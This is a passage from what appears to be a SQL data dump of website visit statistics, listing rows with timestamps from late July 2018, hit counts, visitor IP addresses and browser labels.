.29.198.26','other'),(279546,1532843773,1,1,0,0,'180.76.15.140','other'),(279547,1532844070,7,7,0,0,'216.244.66.241','other'),(279548,1532844757,2,2,0,0,'92.113.189.235','chrome'),(279549,1532844854,1,1,0,0,'8.29.198.26','other'),(279550,1532845068,1,1,0,0,'46.211.154.0','other'),(279551,1532845325,5,5,0,0,'40.77.167.148','other'),(279552,1532845701,4,4,0,0,'207.46.13.130','other'),(279553,1532845706,3,3,0,0,'40.77.167.49','other'),(279554,1532845710,6,6,0,0,'157.55.39.46','other'),(279555,1532846293,3,3,0,0,'216.244.66.241','other'),(279556,1532847036,6,6,0,0,'157.55.39.46','other'),(279557,1532847043,4,4,0,0,'207.46.13.130','other'),(279558,1532847134,1,1,0,0,'46.211.157.194','other'),(279559,1532847845,1,1,0,0,'37.73.246.241','chrome'),(279560,1532847894,1,1,0,0,'95.163.255.93','other'),(279561,1532848375,1,0,1,0,'66.249.69.157',''),(279562,1532848839,1,1,0,0,'188.125.165.26','firefox'),(279563,1532850250,1,1,0,0,'37.9.113.60','other'),(279564,1532850774,1,1,0,0,'91.209.11.236','other'),(279565,1532851025,1,1,0,0,'37.9.113.186','other'),(279566,1532851137,1,1,0,0,'5.45.207.69','other'),(279567,1532851465,4,4,0,0,'216.244.66.241','other'),(279568,1532854234,1,1,0,0,'182.160.123.218','firefox'),(279569,1532854424,1,1,0,0,'8.29.198.27','other'),(279570,1532855260,2,2,0,0,'91.209.11.236','other'),(279571,1532855443,1,1,0,0,'46.211.120.97','other'),(279572,1532855707,1,1,0,0,'8.29.198.25','other'),(279573,1532856409,4,4,0,0,'207.46.13.58','other'),(279574,1532856413,3,3,0,0,'40.77.167.49','other'),(279575,1532856418,4,4,0,0,'40.77.167.148','other'),(279576,1532856428,6,6,0,0,'157.55.39.46','other'),(279577,1532857219,2,2,0,0,'46.133.197.63','chrome'),(279578,1532857645,1,1,0,0,'54.165.59.7','other'),(279579,1532859231,2,2,0,0,'216.244.66.241','other'),(279580,1532860603,1,1,0,0,'79.137.143.220','chrome'),(279581,1532861294,16,16,0,0,'45.64.130.135','other'),(279582,1532861312,10,10,0,0,'45.64.130.135','opera'),(279583,1532861358,1,1,0,0,'54.86.92.60','msie'),(279584,1532861662,1,1,0,0,'216.244.66.241','other'),(279585,1532865299,1,1,0,0,'8.29.198.25','other'),(279586,1532865818,1,1,0,0,'37.9.113.100','other'),(279587,1532866308,1,1,0,0,'37.9.113.157','other'),(279588,1532866573,1,1,0,0,'8.29.198.25','other'),(279589,1532867074,1,1,0,0,'5.45.207.58','other'),(279590,1532867567,2,2,0,0,'216.244.66.241','other'),(279591,1532868234,1,1,0,0,'37.9.113.151','other'),(279592,1532868674,2,2,0,0,'92.113.189.235','chrome'),(279593,1532868930,4,4,0,0,'207.46.13.58','other'),(279594,1532868936,6,6,0,0,'157.55.39.46','other'),(279595,1532871400,6,6,0,0,'157.55.39.46','other'),(279596,1532871406,4,4,0,0,'207.46.13.58','other'),(279597,1532871411,3,3,0,0,'40.77.167.49','other'),(279598,1532871416,4,4,0,0,'40.77.167.148','other'),(279599,1532872788,1,1,0,0,'216.244.66.241','other'),(279600,1532873495,4,4,0,0,'207.46.13.58','other'),(279601,1532873500,6,6,0,0,'157.55.39.46','other'),(279602,1532873506,3,3,0,0,'40.77.167.49','other'),(279603,1532873510,4,4,0,0,'40.77.167.148','other'),(279604,1532873558,2,2,0,0,'92.113.189.235','chrome'),(279605,1532874107,1,1,0,0,'180.76.15.21','other'),(279606,1532875282,1,1,0,0,'37.9.113.115','other'),(279607,1532875286,2,2,0,0,'216.244.66.241','other'),(279608,1532875450,1,1,0,0,'87.250.224.125','other'),(279609,1532876147,1,1,0,0,'8.29.198.25','other'),(279610,1532877031,1,1,0,0,'178.154.200.8','other'),(279611,1532877266,1,1,0,0,'54.165.59.7','other'),(279612,1532877424,1,1,0,0,'8.29.198.27','other'),(279613,1532877601,2,2,0,0,'216.244.66.241','other'),(279614,1532878589,4,4,0,0,'54.165.59.7','other'),(279615,1532879558,1,1,0,0,'216.244.66.241','other'),(279616,1532880693,1,1,0,0,'35.202.99.105','other'),(279617,1532881051,1,1,0,0,'54.165.59.7','other'),(279618,1532881087,1,1,0,0,'178.154.200.59','other'),(279619,1532881980,1,1,0,0,'141.8.142.96','other'),(279620,1532881985,1,1,0,0,'178.154.200.7','other'),(279621,1532882003,1,1,0,0,'95.163.255.102','other'),(279622,1532882176,1,1,0,0,'54.165.59.7','other'),(279623,1532883219,1,1,0,0,'54.165.59.7','other'),(279624,1532883373,1,1,0,0,'37.9.113.115','other'),(279625,1532884592,6,6,0,0,'157.55.39.46','other'),(279626,1532884599,4,4,0,0,'207.46.13.58','other'),(279627,1532884758,1,1,0,0,'178.154.171.10','other'),(279628,1532884760,1,1,0,0,'37.9.113.134','other'),(279629,1532885921,1,1,0,0,'180.76.15.13','other'),(279630,1532886986,1,1,0,0,'8.29.198.26','other'),(279631,1532887855,1,1,0,0,'66.249.81.200','chrome'),(279632,1532888032,1,1,0,0,'91.196.178.130','firefox'),(279633,1532888263,1,1,0,0,'8.29.198.25','other'),(279634,1532890567,1,1,0,0,'216.244.66.241','other'),(279635,1532890658,1,1,0,0,'37.9.113.186','other'),(279636,1532890668,1,1,0,0,'207.46.13.58','other'),(279637,1532892125,1,1,0,0,'157.55.39.46','other'),(279638,1532892572,1,1,0,0,'216.244.66.241','other'),(279639,1532893165,1,1,0,0,'91.217.13.41','chrome'),(279640,1532894032,1,1,0,0,'40.77.167.148','other'),(279641,1532896060,1,1,0,0,'178.154.200.8','other'),(279642,1532896125,1,1,0,0,'141.8.142.29','other'),(279643,1532897028,1,1,0,0,'141.8.142.167','other'),(279644,1532897820,1,1,0,0,'8.29.198.25','other'),(279645,1532899115,1,1,0,0,'8.29.198.27','other'),(279646,1532899757,1,1,0,0,'141.8.142.134','other'),(279647,1532901908,2,2,0,0,'216.244.66.241','other'),(279648,1532904511,2,2,0,0,'216.244.66.241','other'),(279649,1532905638,1,1,0,0,'87.250.224.46','other'),(279650,1532907244,1,1,0,0,'216.244.66.241','other'),(279651,1532908660,1,1,0,0,'8.29.198.27','other'),(279652,1532908862,1,1,0,0,'178.154.200.7','other'),(279653,1532908879,1,1,0,0,'37.9.113.157','other'),(279654,1532909653,2,2,0,0,'216.244.66.241','other'),(279655,1532909966,1,1,0,0,'8.29.198.26','other'),(279656,1532911452,1,1,0,0,'66.249.69.157','chrome'),(279657,1532911687,1,1,0,0,'109.237.210.126','firefox'),(279658,1532912665,1,1,0,0,'95.163.255.157','other'),(279659,1532913249,1,1,0,0,'87.250.224.46','other'),(279660,1532913288,1,1,0,0,'35.162.70.167','chrome'),(279661,1532914276,1,0,1,0,'66.249.75.195',''),(279662,1532915029,2,2,0,0,'216.244.66.241','other'),(279663,1532915041,1,1,0,0,'35.202.99.105','other'),(279664,1532917021,1,1,0,0,'178.238.233.160','firefox'),(279665,1532917430,3,3,0,0,'216.244.66.241','other'),(279666,1532917946,1,1,0,0,'87.250.224.39','other'),(279667,1532918231,1,1,0,0,'95.163.255.195','other'),(279668,1532919002,1,1,0,0,'95.163.255.175','other'),(279669,1532919305,6,6,0,0,'216.244.66.241','other'),(279670,1532919492,1,1,0,0,'8.29.198.25','other'),(279671,1532920426,1,1,0,0,'13.66.172.68','other'),(279672,1532920803,1,1,0,0,'8.29.198.26','other'),(279673,1532921250,1,1,0,0,'141.8.142.74','other'),(279674,1532923082,1,1,0,0,'216.244.66.241','other'),(279675,1532923183,26,26,0,0,'144.76.118.82','other'),(279676,1532924213,1,1,0,0,'87.250.224.39','other'),(279677,1532924351,1,1,0,0,'95.163.255.167','other'),(279678,1532925345,1,1,0,0,'5.45.207.58','other'),(279679,1532925735,1,1,0,0,'157.55.39.46','other'),(279680,1532926755,1,1,0,0,'95.108.213.24','other'),(279681,1532926948,1,1,0,0,'178.154.171.60','other'),(279682,1532927371,1,1,0,0,'95.163.255.96','other'),(279683,1532927526,1,1,0,0,'95.163.255.184','other'),(279684,1532927737,2,2,0,0,'162.210.196.98','other'),(279685,1532927766,1,1,0,0,'216.244.66.241','other'),(279686,1532928609,1,1,0,0,'176.15.231.136','chrome'),(279687,1532928851,1,1,0,0,'180.76.15.17','other'),(279688,1532928911,1,1,0,0,'95.163.255.105','other'),(279689,1532929435,1,1,0,0,'95.163.255.172','other'),(279690,1532929888,1,1,0,0,'95.163.255.195','other'),(279691,1532930329,1,1,0,0,'8.29.198.26','other'),(279692,1532930362,1,1,0,0,'13.66.172.68','other'),(279693,1532930406,2,2,0,0,'216.244.66.241','other'),(279694,1532930938,1,1,0,0,'91.124.182.170','firefox'),(279695,1532931139,1,1,0,0,'141.8.142.152','other'),(279696,1532931465,1,1,0,0,'66.102.9.35','chrome'),(279697,1532931639,1,1,0,0,'8.29.198.25','other'),(279698,1532932272,2,2,0,0,'91.196.178.86','chrome'),(279699,1532932286,2,2,0,0,'216.244.66.241','other'),(279700,1532932702,1,1,0,0,'207.46.13.58','other'),(279701,1532933061,2,2,0,0,'91.196.178.169','chrome'),(279702,1532933333,1,1,0,0,'91.202.144.106','chrome'),(279703,1532934317,2,2,0,0,'91.196.178.86','chrome'),(279704,1532934327,1,1,0,0,'91.196.178.130','firefox'),(279705,1532934437,11,11,0,0,'23.237.4.26','other'),(279706,1532934596,1,1,0,0,'95.163.255.174','other'),(279707,1532934934,1,1,0,0,'87.250.224.77','other'),(279708,1532934938,1,1,0,0,'37.9.113.60','other'),(279709,1532935170,1,1,0,0,'37.9.113.138','other'),(279710,1532935404,2,2,0,0,'216.244.66.241','other'),(279711,1532935499,1,1,0,0,'91.196.177.205','chrome'),(279712,1532935503,1,1,0,0,'91.196.178.86','chrome'),(279713,1532935531,2,2,0,0,'92.112.125.37','chrome'),(279714,1532936147,1,1,0,0,'91.196.178.169','chrome'),(279715,1532936595,1,1,0,0,'5.45.207.83','other'),(279716,1532936720,1,1,0,0,'91.213.33.118','chrome'),(279717,1532937379,1,1,0,0,'178.93.8.25','chrome'),(279718,1532937528,2,2,0,0,'91.196.178.103','chrome'),(279719,1532937565,1,1,0,0,'95.132.31.142','firefox'),(279720,1532937566,1,1,0,0,'5.45.207.58','other'),(279721,1532938259,1,1,0,0,'141.8.142.29','other'),(279722,1532938429,1,1,0,0,'141.8.142.96','other'),(279723,1532938432,1,1,0,0,'178.154.200.59','other'),(279724,1532939320,1,1,0,0,'52.53.201.78','chrome'),(279725,1532939630,14,14,0,0,'207.46.13.58','other'),(279726,1532939644,25,25,0,0,'157.55.39.46','other'),(279727,1532940465,1,1,0,0,'94.153.229.229','other'),(279728,1532940853,2,2,0,0,'92.112.125.37','chrome'),(279729,1532941167,1,1,0,0,'8.29.198.26','other'),(279730,1532941556,2,2,0,0,'91.196.178.65','chrome'),(279731,1532942123,1,1,0,0,'95.132.32.90','firefox'),(279732,1532942477,1,1,0,0,'8.29.198.25','other'),(279733,1532943315,1,1,0,0,'216.244.66.241','other'),(279734,1532943819,1,0,1,0,'66.249.69.158',''),(279735,1532943874,2,0,2,0,'66.249.69.156',''),(279736,1532944058,1,1,0,0,'178.154.171.81','other'),(279737,1532946863,1,1,0,0,'180.76.15.34','other'),(279738,1532947325,1,1,0,0,'95.163.255.184','other'),(279739,1532948526,2,2,0,0,'216.244.66.241','other'),(279740,1532949306,2,2,0,0,'91.196.178.68','chrome'),(279741,1532949481,1,1,0,0,'91.196.178.135','firefox'),(279742,1532950052,1,1,0,0,'95.163.255.156','other'),(279743,1532950320,1,1,0,0,'207.46.13.58','other'),(279744,1532950658,1,1,0,0,'178.154.171.88','other'),(279745,1532951541,1,1,0,0,'178.94.32.120','chrome'),(279746,1532951752,1,0,1,0,'66.249.75.199',''),(279747,1532952002,1,1,0,0,'8.29.198.26','other'),(279748,1532952243,2,2,0,0,'91.196.178.54','chrome'),(279749,1532952358,1,1,0,0,'178.154.171.88','other'),(279750,1532952808,1,1,0,0,'178.92.238.37','chrome'),(279751,1532952822,1,1,0,0,'95.163.255.178','other'),(279752,1532952994,1,1,0,0,'141.8.142.74','other'),(279753,1532953190,2,2,0,0,'216.244.66.241','other'),(279754,1532953332,1,1,0,0,'8.29.198.27','other'),(279755,1532953445,2,2,0,0,'91.196.178.86','chrome'),(279756,1532953460,3,3,0,0,'91.196.178.89','chrome'),(279757,1532953690,2,0,2,0,'66.249.69.158',''),(279758,1532954159,3,3,0,0,'46.174.163.134','chrome'),(279759,1532954285,1,1,0,0,'216.244.66.241','other'),(279760,1532954457,2,2,0,0,'91.196.178.86','chrome'),(279761,1532956330,1,1,0,0,'157.55.39.46','other'),(279762,1532957343,2,2,0,0,'91.196.178.86','chrome'),(279763,1532957557,1,1,0,0,'92.113.93.139','chrome'),(279764,1532957625,2,2,0,0,'91.196.178.167','chrome'),(279765,1532958331,1,1,0,0,'37.54.1.107','chrome'),(279766,1532958336,1,1,0,0,'91.124.182.170','firefox'),(279767,1532958484,3,3,0,0,'91.196.178.169','chrome'),(279768,1532959718,2,2,0,0,'141.8.142.74','other'),(279769,1532960259,1,1,0,0,'178.154.171.88','other'),(279770,1532960271,2,2,0,0,'94.153.229.229','chrome'),(279771,1532960619,1,0,1,0,'66.249.75.201',''),(279772,1532961222,1,1,0,0,'216.244.66.241','other'),(279773,1532961704,2,2,0,0,'141.8.142.74','other'),(279774,1532961713,1,1,0,0,'91.196.178.134','chrome'),(279775,1532961807,1,1,0,0,'188.230.43.254','other'),(279776,1532961897,1,1,0,0,'87.250.224.46','other'),(279777,1532962373,2,2,0,0,'216.244.66.241','other'),(279778,1532962675,1,1,0,0,'178.154.171.88','other'),(279779,1532962688,1,1,0,0,'91.196.178.67','firefox'),(279780,1532962874,1,1,0,0,'8.29.198.27','other'),(279781,1532963099,1,1,0,0,'95.163.255.160','other'),(279782,1532963384,1,1,0,0,'216.244.66.241','other'),(279783,1532963517,1,1,0,0,'87.250.224.46','other'),(279784,1532963606,1,1,0,0,'178.154.171.88','other'),(279785,1532964200,1,1,0,0,'8.29.198.26','other'),(279786,1532964207,1,1,0,0,'188.230.43.254','other'),(279787,1532964338,4,4,0,0,'144.76.119.201','other'),(279788,1532964609,1,1,0,0,'87.250.224.46','other'),(279789,1532965022,3,3,0,0,'216.244.66.241','other'),(279790,1532965510,2,2,0,0,'141.8.142.74','other'),(279791,1532966487,11,11,0,0,'37.57.218.243','other'),(279792,1532966602,1,1,0,0,'188.230.43.254','other'),(279793,1532966963,1,1,0,0,'87.250.224.46','other'),(279794,1532967046,2,2,0,0,'141.8.142.74','other'),(279795,1532967086,2,2,0,0,'78.111.185.136','chrome'),(279796,1532967310,1,0,1,0,'66.249.75.195',''),(279797,1532967930,1,1,0,0,'82.145.208.224','other'),(279798,1532967972,2,2,0,0,'178.154.171.88','other'),(279799,1532968517,1,1,0,0,'95.163.255.153','other'),(279800,1532969003,1,1,0,0,'188.230.43.254','other'),(279801,1532969039,1,1,0,0,'87.250.224.46','other'),(279802,1532969240,1,1,0,0,'216.244.66.241','other'),(279803,1532970028,1,1,0,0,'207.46.13.58','other'),(279804,1532970038,1,1,0,0,'87.250.224.46','other'),(279805,1532970070,2,2,0,0,'141.8.142.74','other'),(279806,1532971376,2,2,0,0,'216.244.66.241','other'),(279807,1532971401,1,1,0,0,'188.230.43.254','other'),(279808,1532971821,1,1,0,0,'37.9.113.182','other'),(279809,1532972508,1,1,0,0,'95.163.255.109','other'),(279810,1532972552,1,1,0,0,'141.8.142.74','other'),(279811,1532972611,1,1,0,0,'87.250.224.46','other'),(279812,1532972734,2,2,0,0,'178.154.171.88','other'),(279813,1532973557,3,3,0,0,'92.113.189.235','chrome'),(279814,1532973721,1,1,0,0,'8.29.198.25','other'),(279815,1532974289,1,1,0,0,'178.154.171.88','other'),(279816,1532974466,1,1,0,0,'216.244.66.241','other'),(279817,1532974518,1,1,0,0,'82.145.208.164','other'),(279818,1532975055,1,1,0,0,'8.29.198.26','other'),(279819,1532975156,1,1,0,0,'82.145.208.80','other'),(279820,1532975413,1,1,0,0,'37.9.113.182','other'),(279821,1532975473,2,2,0,0,'178.154.171.88','other'),(279822,1532976373,2,2,0,0,'141.8.142.74','other'),(279823,1532976595,1,1,0,0,'40.77.167.148','other'),(279824,1532977048,1,1,0,0,'95.163.255.94','other'),(279825,1532977156,3,3,0,0,'216.244.66.241','other'),(279826,1532978719,1,1,0,0,'178.154.171.88','other'),(279827,1532978902,3,3,0,0,'141.8.142.74','other'),(279828,1532979052,1,1,0,0,'87.250.224.46','other'),(279829,1532980165,1,1,0,0,'178.92.75.128','chrome'),(279830,1532982261,2,2,0,0,'216.244.66.241','other'),(279831,1532982392,1,1,0,0,'178.92.140.184','chrome'),(279832,1532982495,2,2,0,0,'87.250.224.46','other'),(279833,1532983559,1,1,0,0,'178.154.200.41','other'),(279834,1532983623,1,1,0,0,'87.250.224.46','other'),(279835,1532984077,1,1,0,0,'91.196.178.84','chrome'),(279836,1532984587,1,1,0,0,'8.29.198.27','other'),(279837,1532984711,1,1,0,0,'216.244.66.241','other'),(279838,1532985320,1,1,0,0,'91.209.11.236','other'),(279839,1532985349,1,1,0,0,'178.154.171.88','other'),(279840,1532985877,1,1,0,0,'141.8.142.74','other'),(279841,1532985913,1,1,0,0,'8.29.198.27','other'),(279842,1532985917,1,1,0,0,'37.9.113.182','other'),(279843,1532986432,1,1,0,0,'157.55.39.46','other'),(279844,1532986743,1,1,0,0,'91.209.11.236','other'),(279845,1532986800,2,2,0,0,'141.8.142.74','other'),(279846,1532987142,1,1,0,0,'178.154.200.41','other'),(279847,1532987263,2,2,0,0,'216.244.66.241','other'),(279848,1532987774,1,1,0,0,'87.250.224.46','other'),(279849,1532988516,1,1,0,0,'95.163.255.159','other'),(279850,1532988974,1,1,0,0,'87.250.224.46','other'),(279851,1532989629,1,1,0,0,'141.8.132.19','other'),(279852,1532989785,1,1,0,0,'37.9.113.182','other'),(279853,1532989824,2,2,0,0,'178.154.171.88','other'),(279854,1532990487,1,1,0,0,'216.244.66.241','other'),(279855,1532991403,1,0,1,0,'66.249.75.199',''),(279856,1532991442,1,1,0,0,'178.154.171.88','other'),(279857,1532991548,1,0,1,0,'66.249.75.201',''),(279858,1532992248,2,2,0,0,'141.8.142.74','other'),(279859,1532993097,1,1,0,0,'216.244.66.241','other'),(279860,1532994860,1,1,0,0,'178.154.171.60','other'),(279861,1532995442,1,1,0,0,'8.29.198.25','other'),(279862,1532995594,1,0,1,0,'66.249.75.195',''),(279863,1532995980,1,1,0,0,'216.244.66.241','other'),(279864,1532996000,1,1,0,0,'178.154.200.41','other'),(279865,1532996261,1,1,0,0,'178.154.171.88','other'),(279866,1532996781,1,1,0,0,'8.29.198.26','other'),(279867,1532997053,1,1,0,0,'207.46.13.58','other'),(279868,1532998388,1,1,0,0,'216.244.66.241','other'),(279869,1532999978,1,1,0,0,'52.34.24.33','chrome'),(279870,1533000440,2,2,0,0,'141.8.142.74','other'),(279871,1533000689,1,1,0,0,'87.250.224.46','other'),(279872,1533001066,3,3,0,0,'216.244.66.241','other'),(279873,1533001274,1,1,0,0,'178.154.171.88','other'),(279874,1533002658,1,0,1,0,'66.249.69.158',''),(279875,1533002695,1,0,1,0,'66.249.69.156',''),(279876,1533002733,1,1,0,0,'66.249.69.156','chrome'),(279877,1533003835,1,1,0,0,'54.165.59.7','other'),(279878,1533003858,3,3,0,0,'216.244.66.241','other'),(279879,1533004040,1,1,0,0,'37.9.113.157','other'),(279880,1533004226,1,1,0,0,'213.180.203.40','other'),(279881,1533004236,1,1,0,0,'178.154.171.4','other'),(279882,1533004268,1,1,0,0,'95.163.255.93','other'),(279883,1533004702,1,1,0,0,'66.249.75.195','chrome'),(279884,1533004909,1,1,0,0,'178.154.171.55','other'),(279885,1533005007,1,1,0,0,'37.9.113.182','other'),(279886,1533005036,1,1,0,0,'95.163.255.179','other'),(279887,1533005226,1,1,0,0,'37.9.113.134','other'),(279888,1533005402,1,0,1,0,'66.249.75.201',''),(279889,1533005432,2,2,0,0,'95.213.141.126','opera'),(279890,1533005647,2,2,0,0,'178.154.171.4','other'),(279891,1533005710,2,2,0,0,'216.244.66.241','other'),(279892,1533006290,1,1,0,0,'8.29.198.25','other'),(279893,1533006713,1,0,1,0,'66.249.75.201',''),(279894,1533006797,1,1,0,0,'87.250.224.46','other'),(279895,1533007460,1,0,1,0,'66.249.75.199',''),(279896,1533007583,1,1,0,0,'141.8.142.74','other'),(279897,1533007598,1,1,0,0,'178.154.171.88','other'),(279898,1533007624,1,1,0,0,'8.29.198.25','other'),(279899,1533007933,1,1,0,0,'95.163.255.97','other'),(279900,1533007950,1,1,0,0,'46.42.133.188','firefox'),(279901,1533008317,1,1,0,0,'216.244.66.241','other'),(279902,1533008508,1,1,0,0,'178.154.171.88','other'),(279903,1533009924,2,0,2,0,'66.249.75.201',''),(279904,1533010002,1,0,1,0,'66.249.75.195',''),(279905,1533011268,5,5,0,0,'216.244.66.241','other'),(279906,1533011297,46,46,0,0,'144.76.4.41','other'),(279907,1533012043,1,1,0,0,'178.154.200.41','other'),(279908,1533012045,1,1,0,0,'178.154.200.32','other'),(279909,1533012434,3,0,3,0,'66.249.75.201',''),(279910,1533012658,1,1,0,0,'178.154.200.7','other'),(279911,1533013000,1,1,0,0,'95.216.0.38','other'),(279912,1533013359,1,0,1,0,'66.249.75.195',''),(279913,1533013743,1,0,1,0,'66.249.75.201',''),(279914,1533013749,2,2,0,0,'91.196.177.46','firefox'),(279915,1533013932,1,1,0,0,'141.8.142.74','other'),(279916,1533013936,1,1,0,0,'37.9.113.182','other'),(279917,1533013994,3,3,0,0,'216.244.66.241','other'),(279918,1533014546,1,1,0,0,'94.178.207.235','chrome'),(279919,1533014882,3,3,0,0,'195.10.210.70','chrome'),(279920,1533015747,1,1,0,0,'87.250.224.46','other'),(279921,1533016334,3,3,0,0,'91.196.178.86','chrome'),(279922,1533016579,3,3,0,0,'216.244.66.241','other'),(279923,1533016655,1,1,0,0,'95.163.255.181','other'),(279924,1533016819,1,1,0,0,'91.196.177.46','firefox'),(279925,1533017147,1,1,0,0,'8.29.198.25','other'),(279926,1533017688,1,1,0,0,'95.163.255.166','other'),(279927,1533018496,1,1,0,0,'8.29.198.26','other'),(279928,1533018971,2,2,0,0,'91.196.178.66','firefox'),(279929,1533019081,3,3,0,0,'216.244.66.241','other'),(279930,1533019240,2,2,0,0,'141.8.142.74','other'),(279931,1533019263,1,1,0,0,'87.250.224.46','other'),(279932,1533020137,2,0,2,0,'66.249.75.195',''),(279933,1533020341,1,1,0,0,'40.77.167.148','other'),(279934,1533020644,1,1,0,0,'95.163.255.158','other'),(279935,1533020791,1,0,1,0,'66.249.75.199',''),(279936,1533020883,1,1,0,0,'178.93.8.170','firefox'),(279937,1533020943,1,1,0,0,'141.8.142.74','other'),(279938,1533020952,1,1,0,0,'178.154.171.88','other'),(279939,1533021015,3,3,0,0,'91.196.178.86','chrome'),(279940,1533021232,1,1,0,0,'31.43.25.69','chrome'),(279941,1533021277,1,1,0,0,'94.153.192.46','firefox'),(279942,1533021937,2,0,2,0,'66.249.75.199',''),(279943,1533021984,1,1,0,0,'178.154.171.88','other'),(279944,1533022118,1,1,0,0,'95.163.255.179','other'),(279945,1533022129,1,1,0,0,'216.244.66.241','other'),(279946,1533022534,2,2,0,0,'108.59.8.70','other'),(279947,1533022551,1,1,0,0,'95.163.255.161','other'),(279948,1533022711,1,1,0,0,'5.45.207.82','other'),(279949,1533022714,1,1,0,0,'87.250.224.77','other'),(279950,1533023407,1,1,0,0,'213.180.203.40','other'),(279951,1533023992,1,1,0,0,'178.95.252.40','chrome'),(279952,1533024075,2,2,0,0,'176.120.111.119','chrome'),(279953,1533024178,1,1,0,0,'46.219.57.138','chrome'),(279954,1533024463,1,1,0,0,'216.244.66.241','other'),(279955,1533024754,1,1,0,0,'87.250.224.46','other'),(279956,1533025754,1,1,0,0,'95.133.194.181','chrome'),(279957,1533026293,1,1,0,0,'193.200.248.131','other'),(279958,1533026333,1,0,1,0,'66.249.75.195',''),(279959,1533026416,2,2,0,0,'91.196.178.86','chrome'),(279960,1533026489,1,1,0,0,'207.46.13.58','other'),(279961,1533026594,1,0,1,0,'66.249.75.201',''),(279962,1533027077,1,1,0,0,'216.244.66.241','other'),(279963,1533027306,2,2,0,0,'178.154.171.88','other'),(279964,1533027356,2,2,0,0,'91.196.178.86','chrome'),(279965,1533027999,1,1,0,0,'8.29.198.26','other'),(279966,1533028072,1,1,0,0,'93.183.218.244','firefox'),(279967,1533028450,2,2,0,0,'91.196.178.86','chrome'),(279968,1533028530,1,0,1,0,'66.249.75.199',''),(279969,1533028882,1,0,1,0,'66.249.75.201',''),(279970,1533029246,2,2,0,0,'134.249.146.125','chrome'),(279971,1533029348,1,1,0,0,'8.29.198.27','other'),(279972,1533029499,5,5,0,0,'216.244.66.241','other'),(279973,1533029795,1,1,0,0,'78.111.185.18','chrome'),(279974,1533030002,2,2,0,0,'91.196.178.86','chrome'),(279975,1533030078,1,1,0,0,'178.154.171.88','other'),(279976,1533030206,1,1,0,0,'141.8.142.74','other'),(279977,1533030434,1,1,0,0,'95.163.255.165','other'),(279978,1533030812,1,0,1,0,'66.249.75.201',''),(279979,1533030899,4,4,0,0,'195.201.35.71','other'),(279980,1533030987,1,1,0,0,'92.112.43.81','chrome'),(279981,1533031186,1,1,0,0,'5.45.207.58','other'),(279982,1533031561,2,2,0,0,'93.183.218.244','firefox'),(279983,1533032151,1,1,0,0,'5.45.207.49','other'),(279984,1533032236,2,2,0,0,'216.244.66.241','other'),(279985,1533032902,1,0,1,0,'66.249.75.201',''),(279986,1533033201,1,1,0,0,'188.230.43.254','other'),(279987,1533033626,3,3,0,0,'178.154.171.88','other'),(279988,1533033898,1,1,0,0,'95.163.255.169','other'),(279989,1533034048,1,1,0,0,'92.113.93.139','chrome'),(279990,1533034178,1,1,0,0,'195.34.75.32','chrome'),(279991,1533035486,1,1,0,0,'31.43.31.3','chrome'),(279992,1533035786,1,1,0,0,'95.163.255.116','other'),(279993,1533036149,1,0,1,0,'66.249.75.195',''),(279994,1533036181,2,2,0,0,'195.10.210.70','chrome'),(279995,1533036329,2,0,2,0,'66.249.75.199',''),(279996,1533036477,1,0,1,0,'66.249.75.201',''),(279997,1533037203,3,3,0,0,'141.8.142.74','other'),(279998,1533037231,1,1,0,0,'178.154.171.88','other'),(279999,1533037391,3,3,0,0,'213.108.43.144','chrome'),(280000,1533037556,2,2,0,0,'216.244.66.241','other'),(280001,1533037566,4,4,0,0,'37.57.218.243','other'),(280002,1533037923,6,6,0,0,'144.76.176.171','other'),(280003,1533038286,2,2,0,0,'178.154.171.88','other'),(280004,1533038294,1,1,0,0,'141.8.142.74','other'),(280005,1533038570,2,2,0,0,'91.196.178.169','chrome'),(280006,1533038865,1,1,0,0,'8.29.198.26','other'),(280007,1533038886,1,1,0,0,'180.76.15.148','other'),(280008,1533039316,1,1,0,0,'141.8.142.74','other'),(280009,1533039324,1,1,0,0,'37.54.171.70','chrome'),(280010,1533039499,1,1,0,0,'91.196.177.46','chrome'),(280011,1533039544,1,1,0,0,'93.183.224.86','chrome'),(280012,1533039915,2,2,0,0,'216.244.66.241','other'),(280013,1533039953,1,1,0,0,'87.250.224.85','other'),(280014,1533040011,1,1,0,0,'95.163.255.176','other'),(280015,1533040132,1,1,0,0,'185.29.253.98','chrome'),(280016,1533040307,1,1,0,0,'8.29.198.26','other'),(280017,1533040678,1,1,0,0,'94.179.43.182','chrome'),(280018,1533041099,1,1,0,0,'213.180.203.40','other'),(280019,1533042002,1,1,0,0,'178.154.171.10','other'),(280020,1533042697,1,1,0,0,'37.9.113.115','other'),(280021,1533042734,1,1,0,0,'5.45.207.69','other'),(280022,1533042735,1,1,0,0,'216.244.66.241','other'),(280023,1533042753,1,1,0,0,'141.8.132.22','other'),(280024,1533042768,1,1,0,0,'178.154.200.73','other'),(280025,1533042805,1,1,0,0,'94.179.43.182','chrome'),(280026,1533042846,2,2,0,0,'91.196.178.86','chrome'),(280027,1533043900,1,0,1,0,'66.249.75.199',''),(280028,1533044500,1,1,0,0,'141.8.142.152','other'),(280029,1533044881,1,1,0,0,'37.9.113.115','other'),(280030,1533044979,1,0,1,0,'66.249.75.195',''),(280031,1533045371,1,1,0,0,'5.45.207.49','other'),(280032,1533045519,1,1,0,0,'216.244.66.241','other'),(280033,1533045596,1,1,0,0,'141.8.142.74','other'),(280034,1533045603,2,2,0,0,'91.196.178.169','chrome'),(280035,1533045694,2,2,0,0,'195.10.210.70','chrome'),(280036,1533045743,2,0,2,0,'66.249.69.158',''),(280037,1533045857,1,1,0,0,'92.113.93.139','chrome'),(280038,1533046302,1,1,0,0,'5.45.207.69','other'),(280039,1533047261,1,1,0,0,'5.45.207.49','other'),(280040,1533047501,1,1,0,0,'37.9.113.110','other'),(280041,1533047957,1,0,1,0,'66.249.75.199',''),(280042,1533048040,1,1,0,0,'141.8.132.22','other'),(280043,1533048166,1,1,0,0,'5.45.207.82','other'),(280044,1533048289,1,1,0,0,'216.244.66.241','other'),(280045,1533048532,1,1,0,0,'91.196.178.41','chrome'),(280046,1533048855,1,1,0,0,'141.8.142.74','other'),(280047,1533049276,1,0,1,0,'66.249.69.157',''),(280048,1533049277,1,1,0,0,'66.249.69.158','chrome'),(280049,1533049283,1,0,1,0,'66.249.69.156',''),(280050,1533049301,2,1,1,0,'66.249.75.195',''),(280051,1533049335,1,1,0,0,'141.8.142.152','other'),(280052,1533049605,2,2,0,0,'54.165.59.7','other'),(280053,1533049641,2,2,0,0,'91.196.178.44','chrome'),(280054,1533049709,1,1,0,0,'95.163.255.186','other'),(280055,1533049724,1,1,0,0,'8.29.198.25','other'),(280056,1533050345,2,2,0,0,'216.244.66.241','other'),